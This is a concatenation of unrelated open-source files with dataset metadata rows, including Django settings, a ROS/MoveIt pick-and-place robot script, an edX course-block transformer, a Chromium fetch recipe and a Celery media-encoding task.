('index', 'OpenLMI', u'OpenLMI Documentation',
u'OpenLMI authors', 'OpenLMI', 'One line description of project.',
'Miscellaneous'),
]
# Documents to append as an appendix to all manuals.
#texinfo_appendices = []
# If false, no module index is generated.
#texinfo_domain_indices = True
# How to display URL addresses: 'footnote', 'no', or 'inline'.
#texinfo_show_urls = 'footnote'
# -- Options for Epub output ---------------------------------------------------
# Bibliographic Dublin Core info.
epub_title = u'OpenLMI'
epub_author = u'OpenLMI authors'
epub_publisher = u'OpenLMI authors'
epub_copyright = u'2013-2014, OpenLMI authors'
# The language of the text. It defaults to the language option
# or en if the language is not set.
#epub_language = ''
# The scheme of the identifier. Typical schemes are ISBN or URL.
#epub_scheme = ''
# The unique identifier of the text. This can be a ISBN number
# or the project homepage.
#epub_identifier = ''
# A unique identification for the text.
#epub_uid = ''
# A tuple containing the cover image and cover page html template filenames.
#epub_cover = ()
# HTML files that should be inserted before the pages created by sphinx.
# The format is a list of tuples containing the path and title.
#epub_pre_files = []
# HTML files shat should be inserted after the pages created by sphinx.
# The format is a list of tuples containing the path and title.
#epub_post_files = []
# A list of files that should not be packed into the epub file.
#epub_exclude_files = []
# The depth of the table of contents in toc.ncx.
#epub_tocdepth = 3
# Allow duplicate toc entries.
#epub_tocdup = True
| gpl-2.0 | -3,956,538,577,392,688,600 | 30.13141 | 95 | 0.701431 | false |
sonya/eea | py/common/config.py | 1 | 1080 | DEBUG_MODE = True
#DEBUG_MODE = False
# GNUPlot options
DEFAULT_IMAGE_TYPE = "png" # png, eps
SUPPRESS_PLOT_TITLES = True
DB_NAME = "eea"
DB_PORT = ":5432"
TEST_SCHEMA = "test" # schema for creating verification tables
PROJECT_ROOT = __PROJECT_ROOT__
# things below here probably don't need to be changed much
DATA_DIR = PROJECT_ROOT + "/data"
DATA_CACHE_DIR = PROJECT_ROOT + "/data/cache"
ENV_SERIES_TITLES = {
"EU": "gross energy use",
"CO": "carbon monoxide (CO)",
"CO2": "CO_2",
"CH4": "methane (CH_4)",
"N2O": "nitrous oxide (N_2O)",
"SF6": "sulfur hexafluoride (SF_6)",
"PFCs": "perfluorinated compounds (PFCs)",
"HFCs": "hydroflurocarbons (HFCs)",
"GHG total": "greenhouse gas total",
"NOx": "nitrogen oxides (NO_x)",
"SOx": "sulfur oxides (SO_x)",
"BOD": "biochemical oxygen demand (BOD)",
"TSP": "total suspended particulates (TSP)",
"NMVOC": "non-methane volatile organic compounds",
"NH3": "ammonia (NH_3)",
"waste": "total waste",
"waste-hi": "hazardous waste - improperly disposed",
}
| apache-2.0 | 4,881,714,132,381,469,000 | 26 | 63 | 0.625 | false |
sohovet/sohovet | sohovet_stock_report/__openerp__.py | 1 | 2121 | # -*- encoding: utf-8 -*-
##############################################################################
# #
# OpenERP, Open Source Management Solution. #
# #
# @author Juan Ignacio Alonso Barba <[email protected]> #
# #
# This program is free software: you can redistribute it and/or modify #
# it under the terms of the GNU Affero General Public License as #
# published by the Free Software Foundation, either version 3 of the #
# License, or (at your option) any later version. #
# #
# This program is distributed in the hope that it will be useful, #
# but WITHOUT ANY WARRANTY; without even the implied warranty of #
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the #
# GNU Affero General Public License for more details. #
# #
# You should have received a copy of the GNU Affero General Public License #
# along with this program. If not, see <http://www.gnu.org/licenses/>. #
# #
##############################################################################
{
'name': 'SOHOVet stock report',
'version': '1.0',
'category': 'Productos',
'description': """Informes de almacen""",
'author': 'Juan Ignacio Alonso Barba',
'website': 'http://www.enzo.es/',
'license': 'AGPL-3',
'depends': [
'sohovet_product',
'sohovet_product_sublocation',
],
'data': [
'wizard/sohovet_stock_report.xml',
'report/informe_stock.xml',
'sohovet_report_menu.xml',
],
'active': False,
'installable': True,
}
| agpl-3.0 | -1,146,224,283,432,824,300 | 49.5 | 78 | 0.41537 | false |
Aharobot/inmoov_ros | robbie_sim/node/get_beer.py | 1 | 18206 | #!/usr/bin/env python
"""
get_beer.py - Version 0.1 2015-03-11
pick up the beer can and deliver it another
"""
import rospy, sys
import moveit_commander
from geometry_msgs.msg import PoseStamped, Pose
from moveit_commander import MoveGroupCommander, PlanningSceneInterface
from moveit_msgs.msg import PlanningScene, ObjectColor
from moveit_msgs.msg import Grasp, GripperTranslation, MoveItErrorCodes
from trajectory_msgs.msg import JointTrajectory, JointTrajectoryPoint
from tf.transformations import quaternion_from_euler
from copy import deepcopy
from actionlib import SimpleActionClient
from move_base_msgs.msg import *
from actionlib_msgs.msg import *
from geometry_msgs.msg import *
GROUP_NAME_ARM = 'right_arm'
GROUP_NAME_GRIPPER = 'right_gripper'
GRIPPER_FRAME = 'right_gripper_link'
GRIPPER_OPEN = [0.1]
GRIPPER_CLOSED = [0.5]
GRIPPER_NEUTRAL = [0.0]
GRIPPER_JOINT_NAMES = ['right_arm_gripper_joint']
GRIPPER_EFFORT = [1.0]
REFERENCE_FRAME = 'map'
#Map location of targets
X_FRIDGE = 1.65
Y_FRIDGE = -1.6
X_PERSON = 1.9
Y_PERSON = 1.8
class MoveItDemo:
def __init__(self):
# Initialize the move_group API
moveit_commander.roscpp_initialize(sys.argv)
rospy.init_node('moveit_demo')
# Use the planning scene object to add or remove objects
scene = PlanningSceneInterface()
# Create a scene publisher to push changes to the scene
self.scene_pub = rospy.Publisher('planning_scene', PlanningScene)
# Create a publisher for displaying gripper poses
self.gripper_pose_pub = rospy.Publisher('gripper_pose', PoseStamped)
# Create a dictionary to hold object colors
self.colors = dict()
#move_base action
self.fridge = (Pose(Point(X_FRIDGE, Y_FRIDGE, 0.0), Quaternion(0.0, 0.0, 0, 1))) #location of the beer
self.person = (Pose(Point(X_PERSON, Y_PERSON, 0.0), Quaternion(0.0, 0.0, 0, 1))) #person requesting the beer
self.station = (Pose(Point(0.5, 0.0, 0.0), Quaternion(0.0, 0.0, 0, 1))) #person requesting the beer
self.client = SimpleActionClient("move_base", MoveBaseAction)
self.client.wait_for_server()
# Initialize the move group for the right arm
right_arm = MoveGroupCommander(GROUP_NAME_ARM)
left_arm = MoveGroupCommander('left_arm')
# Initialize the move group for the right gripper
right_gripper = MoveGroupCommander(GROUP_NAME_GRIPPER)
# Get the name of the end-effector link
end_effector_link = right_arm.get_end_effector_link()
# Allow some leeway in position (meters) and orientation (radians)
right_arm.set_goal_position_tolerance(0.05)
right_arm.set_goal_orientation_tolerance(0.1)
# Allow replanning to increase the odds of a solution
right_arm.allow_replanning(True)
# Set the right arm reference frame
right_arm.set_pose_reference_frame(REFERENCE_FRAME)
# Allow 10 seconds per planning attempt
right_arm.set_planning_time(10)
# Set a limit on the number of pick attempts before bailing
max_pick_attempts = 10
# Set a limit on the number of place attempts
max_place_attempts = 5
# Give the scene a chance to catch up
rospy.sleep(2)
# Give each of the scene objects a unique name
table_id = 'table'
box1_id = 'box1'
box2_id = 'box2'
target_id = 'target'
tool_id = 'tool'
person1_id = 'person1'
# Remove leftover objects from a previous run
scene.remove_world_object(table_id)
scene.remove_world_object(box1_id)
scene.remove_world_object(box2_id)
scene.remove_world_object(target_id)
scene.remove_world_object(tool_id)
scene.remove_world_object(person1_id)
# Remove any attached objects from a previous session
scene.remove_attached_object(GRIPPER_FRAME, target_id)
# Give the scene a chance to catch up
rospy.sleep(1)
# Start the arm in the "resting" pose stored in the SRDF file
right_arm.set_named_target('right_start')
right_arm.go()
left_arm.set_named_target('left_start')
left_arm.go()
# Open the gripper to the neutral position
right_gripper.set_joint_value_target(GRIPPER_NEUTRAL)
right_gripper.go()
rospy.sleep(1)
# Set the height of the table off the ground
table_ground = 0.65
# Set the dimensions of the scene objects [l, w, h]
table_size = [0.2, 0.7, 0.01]
box1_size = [0.1, 0.05, 0.05]
box2_size = [0.05, 0.05, 0.15]
person1_size = [0.3, 0.7, 0.01]
# Set the target size [l, w, h]
target_size = [0.02, 0.01, 0.12]
# Add a table top and two boxes to the scene
table_pose = PoseStamped()
table_pose.header.frame_id = REFERENCE_FRAME
table_pose.pose.position.x = X_FRIDGE + 0.55
table_pose.pose.position.y = Y_FRIDGE + 0.0
table_pose.pose.position.z = table_ground + table_size[2] / 2.0
table_pose.pose.orientation.w = 1.0
scene.add_box(table_id, table_pose, table_size)
box1_pose = PoseStamped()
box1_pose.header.frame_id = REFERENCE_FRAME
box1_pose.pose.position.x = X_FRIDGE + 0.55
box1_pose.pose.position.y = Y_FRIDGE + -0.1
box1_pose.pose.position.z = table_ground + table_size[2] + box1_size[2] / 2.0
box1_pose.pose.orientation.w = 1.0
scene.add_box(box1_id, box1_pose, box1_size)
box2_pose = PoseStamped()
box2_pose.header.frame_id = REFERENCE_FRAME
box2_pose.pose.position.x = X_FRIDGE + 0.54
box2_pose.pose.position.y = Y_FRIDGE + 0.13
box2_pose.pose.position.z = table_ground + table_size[2] + box2_size[2] / 2.0
box2_pose.pose.orientation.w = 1.0
scene.add_box(box2_id, box2_pose, box2_size)
#add the person to the scene
person1_pose = PoseStamped()
person1_pose.header.frame_id = REFERENCE_FRAME
person1_pose.pose.position.x = X_PERSON + 0.54
person1_pose.pose.position.y = Y_PERSON + 0.13
person1_pose.pose.position.z = table_ground + table_size[2] + person1_size[2] / 2.0
person1_pose.pose.orientation.w = 1.0
scene.add_box(person1_id, person1_pose, person1_size)
# Set the target pose in between the boxes and on the table
target_pose = PoseStamped()
target_pose.header.frame_id = REFERENCE_FRAME
target_pose.pose.position.x = X_FRIDGE + 0.50
target_pose.pose.position.y = Y_FRIDGE + 0.0
target_pose.pose.position.z = table_ground + table_size[2] + target_size[2] / 2.0
target_pose.pose.orientation.w = 1.0
# Add the target object to the scene
scene.add_box(target_id, target_pose, target_size)
# Make the table red and the boxes orange
self.setColor(table_id, 0.8, 0, 0, 1.0)
self.setColor(box1_id, 0.8, 0.4, 0, 1.0)
self.setColor(box2_id, 0.8, 0.4, 0, 1.0)
self.setColor(person1_id, 0.8, 0, 0, 1.0)
# Make the target yellow
self.setColor(target_id, 0.9, 0.9, 0, 1.0)
# Send the colors to the planning scene
self.sendColors()
# Set the support surface name to the table object
right_arm.set_support_surface_name(table_id)
# Specify a pose to place the target after being picked up
place_pose = PoseStamped()
place_pose.header.frame_id = REFERENCE_FRAME
place_pose.pose.position.x = X_PERSON + 0.50
place_pose.pose.position.y = Y_PERSON + -0.25
place_pose.pose.position.z = table_ground + table_size[2] + target_size[2] / 2.0
place_pose.pose.orientation.w = 1.0
#move to target
self.move_to(self.fridge)
# Initialize the grasp pose to the target pose
grasp_pose = target_pose
# Shift the grasp pose by half the width of the target to center it
grasp_pose.pose.position.y -= target_size[1] / 2.0
# Generate a list of grasps
grasps = self.make_grasps(grasp_pose, [target_id])
# Publish the grasp poses so they can be viewed in RViz
for grasp in grasps:
self.gripper_pose_pub.publish(grasp.grasp_pose)
rospy.sleep(0.2)
# Track success/failure and number of attempts for pick operation
result = None
n_attempts = 0
# Repeat until we succeed or run out of attempts
while result != MoveItErrorCodes.SUCCESS and n_attempts < max_pick_attempts:
n_attempts += 1
rospy.loginfo("Pick attempt: " + str(n_attempts))
result = right_arm.pick(target_id, grasps)
rospy.sleep(0.2)
# If the pick was successful, attempt the place operation
if result == MoveItErrorCodes.SUCCESS:
result = None
n_attempts = 0
#_------------------------now we move to the other table__________-------------------------------------------
right_arm.set_named_target('r_travel')
right_arm.go()
self.move_to(self.person)
#_------------------------now we move to the other table__________-------------------------------------------
# Generate valid place poses
places = self.make_places(place_pose)
# Repeat until we succeed or run out of attempts
while result != MoveItErrorCodes.SUCCESS and n_attempts < max_place_attempts:
n_attempts += 1
rospy.loginfo("Place attempt: " + str(n_attempts))
for place in places:
result = right_arm.place(target_id, place)
if result == MoveItErrorCodes.SUCCESS:
break
rospy.sleep(0.2)
if result != MoveItErrorCodes.SUCCESS:
rospy.loginfo("Place operation failed after " + str(n_attempts) + " attempts.")
else:
rospy.loginfo("Pick operation failed after " + str(n_attempts) + " attempts.")
# Return the arm to the "resting" pose stored in the SRDF file
right_arm.set_named_target('right_start')
right_arm.go()
# Open the gripper to the neutral position
right_gripper.set_joint_value_target(GRIPPER_NEUTRAL)
right_gripper.go()
rospy.sleep(1)
#move to station
self.move_to(self.station)
# Shut down MoveIt cleanly
moveit_commander.roscpp_shutdown()
# Exit the script
moveit_commander.os._exit(0)
# move to location
def move_to(self, location):
goal = MoveBaseGoal()
goal.target_pose.pose = location
goal.target_pose.header.frame_id = 'map'
goal.target_pose.header.stamp = rospy.Time.now()
self.client.send_goal(goal)
#self.client.wait_for_result()
self.client.wait_for_result(rospy.Duration.from_sec(40.0))
if self.client.get_state() == GoalStatus.SUCCEEDED:
result = self.client.get_result()
print "Result: SUCCEEDED "
elif self.client.get_state() == GoalStatus.PREEMPTED:
print "Action pre-empted"
else:
print "Action failed"
# Get the gripper posture as a JointTrajectory
def make_gripper_posture(self, joint_positions):
# Initialize the joint trajectory for the gripper joints
t = JointTrajectory()
# Set the joint names to the gripper joint names
t.joint_names = GRIPPER_JOINT_NAMES
# Initialize a joint trajectory point to represent the goal
tp = JointTrajectoryPoint()
# Assign the trajectory joint positions to the input positions
tp.positions = joint_positions
# Set the gripper effort
tp.effort = GRIPPER_EFFORT
tp.time_from_start = rospy.Duration(1.0)
# Append the goal point to the trajectory points
t.points.append(tp)
# Return the joint trajectory
return t
# Generate a gripper translation in the direction given by vector
def make_gripper_translation(self, min_dist, desired, vector):
# Initialize the gripper translation object
g = GripperTranslation()
# Set the direction vector components to the input
g.direction.vector.x = vector[0]
g.direction.vector.y = vector[1]
g.direction.vector.z = vector[2]
# The vector is relative to the gripper frame
g.direction.header.frame_id = GRIPPER_FRAME
# Assign the min and desired distances from the input
g.min_distance = min_dist
g.desired_distance = desired
return g
# Generate a list of possible grasps
def make_grasps(self, initial_pose_stamped, allowed_touch_objects):
# Initialize the grasp object
g = Grasp()
# Set the pre-grasp and grasp postures appropriately
g.pre_grasp_posture = self.make_gripper_posture(GRIPPER_OPEN)
g.grasp_posture = self.make_gripper_posture(GRIPPER_CLOSED)
# Set the approach and retreat parameters as desired
g.pre_grasp_approach = self.make_gripper_translation(0.01, 0.1, [1.0, 0.0, 0.0])
g.post_grasp_retreat = self.make_gripper_translation(0.1, 0.15, [0.0, -1.0, 1.0])
# Set the first grasp pose to the input pose
g.grasp_pose = initial_pose_stamped
# Pitch angles to try
pitch_vals = [0, 0.1, -0.1, 0.2, -0.2, 0.3, -0.3]
# Yaw angles to try
yaw_vals = [0]
# A list to hold the grasps
grasps = []
# Generate a grasp for each pitch and yaw angle
for y in yaw_vals:
for p in pitch_vals:
# Create a quaternion from the Euler angles
q = quaternion_from_euler(0, p, y)
# Set the grasp pose orientation accordingly
g.grasp_pose.pose.orientation.x = q[0]
g.grasp_pose.pose.orientation.y = q[1]
g.grasp_pose.pose.orientation.z = q[2]
g.grasp_pose.pose.orientation.w = q[3]
# Set and id for this grasp (simply needs to be unique)
g.id = str(len(grasps))
# Set the allowed touch objects to the input list
g.allowed_touch_objects = allowed_touch_objects
# Don't restrict contact force
g.max_contact_force = 0
# Degrade grasp quality for increasing pitch angles
g.grasp_quality = 1.0 - abs(p)
# Append the grasp to the list
grasps.append(deepcopy(g))
# Return the list
return grasps
# Generate a list of possible place poses
def make_places(self, init_pose):
# Initialize the place location as a PoseStamped message
place = PoseStamped()
# Start with the input place pose
place = init_pose
# A list of x shifts (meters) to try
x_vals = [0, 0.005, 0.01, 0.015, -0.005, -0.01, -0.015]
# A list of y shifts (meters) to try
y_vals = [0, 0.005, 0.01, 0.015, -0.005, -0.01, -0.015]
pitch_vals = [0]
# A list of yaw angles to try
yaw_vals = [0]
# A list to hold the places
places = []
# Generate a place pose for each angle and translation
for y in yaw_vals:
for p in pitch_vals:
for y in y_vals:
for x in x_vals:
place.pose.position.x = init_pose.pose.position.x + x
place.pose.position.y = init_pose.pose.position.y + y
# Create a quaternion from the Euler angles
q = quaternion_from_euler(0, p, y)
# Set the place pose orientation accordingly
place.pose.orientation.x = q[0]
place.pose.orientation.y = q[1]
place.pose.orientation.z = q[2]
place.pose.orientation.w = q[3]
# Append this place pose to the list
places.append(deepcopy(place))
# Return the list
return places
# Set the color of an object
def setColor(self, name, r, g, b, a = 0.9):
# Initialize a MoveIt color object
color = ObjectColor()
# Set the id to the name given as an argument
color.id = name
# Set the rgb and alpha values given as input
color.color.r = r
color.color.g = g
color.color.b = b
color.color.a = a
# Update the global color dictionary
self.colors[name] = color
# Actually send the colors to MoveIt!
def sendColors(self):
# Initialize a planning scene object
p = PlanningScene()
# Need to publish a planning scene diff
p.is_diff = True
# Append the colors from the global color dictionary
for color in self.colors.values():
p.object_colors.append(color)
# Publish the scene diff
self.scene_pub.publish(p)
if __name__ == "__main__":
MoveItDemo()
| bsd-3-clause | -6,091,614,471,985,841,000 | 36.155102 | 121 | 0.569263 | false |
richardcornish/conference | emojiweather/emojiweather/settings.py | 1 | 4647 | # Settings
# https://docs.djangoproject.com/en/2.0/topics/settings/
# https://docs.djangoproject.com/en/2.0/ref/settings/
# https://docs.djangoproject.com/en/2.0/howto/deployment/checklist/
import os
import django_heroku
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
SECRET_KEY = os.environ.get('SECRET_KEY', 'fake-key')
DEBUG = os.environ.get('DEBUG', True)
ALLOWED_HOSTS = [
'.herokuapp.com',
'.emojiweather.app',
]
INTERNAL_IPS = [
'127.0.0.1',
]
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.sitemaps',
'django.contrib.sites',
'django.contrib.staticfiles',
'debug_toolbar',
'widget_tweaks',
'about',
'commands',
'search',
'sms',
'voice',
'utils',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'debug_toolbar.middleware.DebugToolbarMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
'django.contrib.sites.middleware.CurrentSiteMiddleware',
]
ROOT_URLCONF = 'emojiweather.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [
os.path.join(BASE_DIR, 'templates'),
],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'emojiweather.wsgi.application'
# Database
# https://docs.djangoproject.com/en/2.0/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/2.0/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/2.0/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.0/howto/static-files/
STATIC_URL = '/static/'
STATICFILES_DIRS = [
os.path.join(BASE_DIR, 'static'),
]
# Sites
# https://docs.djangoproject.com/en/2.0/ref/contrib/sites/
SITE_ID = os.environ.get('SITE_ID', 1)
# Geolocation
# https://docs.djangoproject.com/en/2.0/ref/contrib/gis/geoip2/
# http://dev.maxmind.com/geoip/geoip2/geolite2/
GEOIP_PATH = os.path.join(BASE_DIR, 'utils', 'maxmind')
# Google Geocoding API
# https://developers.google.com/maps/documentation/geocoding/start
GOOGLE_GEOCODING_API_KEY = os.environ.get('GOOGLE_GEOCODING_API_KEY', '')
# Google Maps JavaScript API
# https://developers.google.com/maps/documentation/javascript/tutorial
GOOGLE_MAPS_API_KEY = os.environ.get('GOOGLE_MAPS_API_KEY', '')
# Dark Sky API
# https://darksky.net/dev/docs
DARK_SKY_API_KEY = os.environ.get('DARK_SKY_API_KEY', '')
# Mattermost API
# https://docs.mattermost.com/developer/slash-commands.html
# https://developers.mattermost.com/integrate/slash-commands/
# https://docs.mattermost.com/help/messaging/formatting-text.html
MATTERMOST_TOKEN_ASK = os.environ.get('MATTERMOST_TOKEN_ASK', '')
MATTERMOST_TOKEN_CHUCK = os.environ.get('MATTERMOST_TOKEN_CHUCK', '')
MATTERMOST_TOKEN_FACT = os.environ.get('MATTERMOST_TOKEN_FACT', '')
MATTERMOST_TOKEN_HOT = os.environ.get('MATTERMOST_TOKEN_HOT', '')
MATTERMOST_TOKEN_PRINT = os.environ.get('MATTERMOST_TOKEN_PRINT', '')
MATTERMOST_TOKEN_WEATHER = os.environ.get('MATTERMOST_TOKEN_WEATHER', '')
# Heroku
# https://devcenter.heroku.com/articles/django-app-configuration
django_heroku.settings(locals())
| mit | 5,700,339,176,886,210,000 | 24.255435 | 91 | 0.685388 | false |
cpennington/edx-platform | lms/djangoapps/course_blocks/transformers/start_date.py | 1 | 2952 | """
Start Date Transformer implementation.
"""
from lms.djangoapps.courseware.access_utils import check_start_date
from openedx.core.djangoapps.content.block_structure.transformer import (
BlockStructureTransformer,
FilteringTransformerMixin
)
from xmodule.course_metadata_utils import DEFAULT_START_DATE
from .utils import collect_merged_date_field
class StartDateTransformer(FilteringTransformerMixin, BlockStructureTransformer):
"""
A transformer that enforces the 'start' and 'days_early_for_beta'
fields on blocks by removing blocks from the block structure for
which the user does not have access. The 'start' field on a
block is percolated down to its descendants, so that all blocks
enforce the 'start' field from their ancestors. The assumed
'start' value for a block is then the maximum of its parent and its
own.
For a block with multiple parents, the assumed parent start date
value is a computed minimum of the start dates of all its parents.
So as long as one parent chain allows access, the block has access.
Staff users are exempted from visibility rules.
"""
WRITE_VERSION = 1
READ_VERSION = 1
MERGED_START_DATE = 'merged_start_date'
@classmethod
def name(cls):
"""
Unique identifier for the transformer's class;
same identifier used in setup.py.
"""
return "start_date"
@classmethod
def _get_merged_start_date(cls, block_structure, block_key):
"""
Returns the merged value for the start date for the block with
the given block_key in the given block_structure.
"""
return block_structure.get_transformer_block_field(
block_key, cls, cls.MERGED_START_DATE, False
)
@classmethod
def collect(cls, block_structure):
"""
Collects any information that's necessary to execute this
transformer's transform method.
"""
block_structure.request_xblock_fields('days_early_for_beta')
collect_merged_date_field(
block_structure,
transformer=cls,
xblock_field_name='start',
merged_field_name=cls.MERGED_START_DATE,
default_date=DEFAULT_START_DATE,
func_merge_parents=min,
func_merge_ancestors=max,
)
def transform_block_filters(self, usage_info, block_structure):
# Users with staff access bypass the Start Date check.
if usage_info.has_staff_access:
return [block_structure.create_universal_filter()]
removal_condition = lambda block_key: not check_start_date(
usage_info.user,
block_structure.get_xblock_field(block_key, 'days_early_for_beta'),
self._get_merged_start_date(block_structure, block_key),
usage_info.course_key,
)
return [block_structure.create_removal_filter(removal_condition)]
| agpl-3.0 | 5,717,390,971,665,340,000 | 34.566265 | 81 | 0.670054 | false |
stz-online/VVSPuentklichkeit | vvs_crawler/vvs_crawler/settings.py | 1 | 3315 | """
Django settings for vvs_crawler project.
For more information on this file, see
https://docs.djangoproject.com/en/1.7/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.7/ref/settings/
"""
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
import os
from YamJam import yamjam
BASE_DIR = os.path.dirname(os.path.dirname(__file__))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.7/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
keys = yamjam("keys.yaml")
SECRET_KEY = keys['django_secret_key']
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
TEMPLATE_DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = (
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'django.contrib.gis',
'django_extensions',
'vvs_map',
'rest_framework'
)
MIDDLEWARE_CLASSES = (
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.auth.middleware.SessionAuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
)
ROOT_URLCONF = 'vvs_crawler.urls'
WSGI_APPLICATION = 'vvs_crawler.wsgi.application'
BROKER_URL = 'redis://localhost:6379/4'.format(keys["redis"]["password"])
# Database
# https://docs.djangoproject.com/en/1.7/ref/settings/#databases
from datetime import timedelta
CELERYBEAT_SCHEDULE = {
'add-every-30-seconds': {
'task': 'vvs_map.tasks.get_json',
'schedule': timedelta(seconds=30),
'args': ()
},
'update-names': {
'task': 'vvs_map.tasks.crawl_stop_names',
'schedule': timedelta(minutes=10),
'args': ()
},
}
DATABASES = {
'default': {
'ENGINE': 'django.contrib.gis.db.backends.postgis', # Add 'postgresql_psycopg2', 'mysql', 'sqlite3' or 'oracle'.
'NAME': 'vvs_crawler', # Or path to database file if using sqlite3.
# The following settings are not used with sqlite3:
'USER': 'postgres',
'PASSWORD': '',
'HOST': 'localhost', # Empty for localhost through domain sockets or '127.0.0.1' for localhost through TCP.
'PORT': '', # Set to empty string for default.
}
}
CACHES = {
'default': {
'BACKEND': 'django.core.cache.backends.db.DatabaseCache',
'LOCATION': 'cache_table_delays',
}
}
# Internationalization
# https://docs.djangoproject.com/en/1.7/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'Europe/Berlin'
USE_I18N = True
USE_L10N = True
USE_TZ = True
SHELL_PLUS = 'ipython'
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.7/howto/static-files/
STATIC_URL = '/static/'
TEMPLATE_DIRS = (
os.path.join(BASE_DIR, 'templates'),
)
| gpl-3.0 | 4,491,424,426,170,239,000 | 26.625 | 150 | 0.659729 | false |
kromain/chromium-tools | recipes/psdriver.py | 1 | 2297 | # Copyright (c) 2014 Sony Network Entertainment Intl. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import sys
import recipe_util # pylint: disable=F0401
# This class doesn't need an __init__ method, so we disable the warning
# pylint: disable=W0232
class PSDriver(recipe_util.Recipe):
"""Fetch recipe class for Sony's Chromium clones."""
@staticmethod
def fetch_spec(props):
url = '[email protected]:SNEI/chromium.git@refs/heads/psdriver'
custom_deps = { "src/tools/gyp" : "[email protected]:SNEI/gyp.git",
}
custom_hooks = [
# Run gyp on content_shell_and_tests.gyp instead off the default all.gyp, to reduce execution time.
# Also specify the content_shell target explicitely to reduce the size of the solution. (tests are filtered out)
{
"name": "gyp",
"pattern": ".",
"action": ["python", "src/build/gyp_chromium", "src/chrome/psdriver.gyp"],
},
# Next, disable all the hooks that pull in stuff we don't care about (see DEPS files for their descriptions)
{
"name": "nacltools",
},
{
"name": "sysroot",
},
{
"name": "clang",
},
{
"name": "gn_win",
},
{
"name": "gn_mac",
},
{
"name": "gn_linux",
},
{
"name": "gn_linux32",
},
{
"name": "clang_format_win",
},
{
"name": "clang_format_mac",
},
{
"name": "clang_format_linux",
},
{
"name": "binutils",
},
{
"name": "eu-strip",
},
]
solution = { 'name' :'src',
'url' : url,
'deps_file': '.DEPS.git',
'managed' : False,
'safesync_url': '',
'custom_deps': custom_deps,
'custom_hooks': custom_hooks,
}
spec = {
'solutions': [solution],
}
return {
'type': 'gclient_git',
'gclient_git_spec': spec,
}
@staticmethod
def expected_root(_props):
return 'src'
def main(argv=None):
return PSDriver().handle_args(argv)
if __name__ == '__main__':
sys.exit(main(sys.argv))
| bsd-3-clause | -7,069,908,839,805,119,000 | 22.927083 | 118 | 0.524597 | false |
collab-project/django-encode | encode/tasks.py | 1 | 4623 | # Copyright Collab 2012-2016
# See LICENSE for details.
"""
Tasks.
"""
from __future__ import unicode_literals
from celery import Task
from celery.utils.log import get_task_logger
from encode.models import MediaBase
from encode.util import fqn, short_path
from encode import EncodeError, UploadError
from encode.encoders import get_encoder_class
__all__ = ['EncodeMedia', 'StoreMedia']
logger = get_task_logger(__name__)
def media_base(obj_id):
"""
:param obj_id: The primary key of the :py:class:`~encode.models.MediaBase`
model.
:type obj_id: int
:rtype: :py:class:`~encode.models.MediaBase` instance
:returns: The :py:class:`~encode.models.MediaBase` instance in question.
"""
try:
# get the object by id
base = MediaBase.objects.get(pk=obj_id)
except MediaBase.DoesNotExist:
logger.error(
"Cannot encode: Media with pk '{0}' does not exist.".format(
obj_id), exc_info=True
)
raise
return base
class EncodeMedia(Task):
"""
Encode a :py:class:`~encode.models.MediaBase` model's ``input_file``.
"""
def run(self, profile, media_id, input_path, output_path):
"""
Execute the task.
:param profile: The :py:class:`~encode.models.EncodingProfile`
instance.
:type profile: :py:class:`~encode.models.EncodingProfile`
:param media_id: The primary key of the
:py:class:`~encode.models.MediaBase` model.
:type media_id: int
:param input_path:
:type input_path: str
:param output_path:
:type output_path:
:rtype: dict
:returns: Dictionary with ``id`` (media object's id) and ``profile``
(encoding profile instance).
"""
# find encoder
Encoder = get_encoder_class(profile.encoder.klass)
encoder = Encoder(profile, input_path, output_path)
logger.debug("***** New '{}' encoder job *****".format(profile))
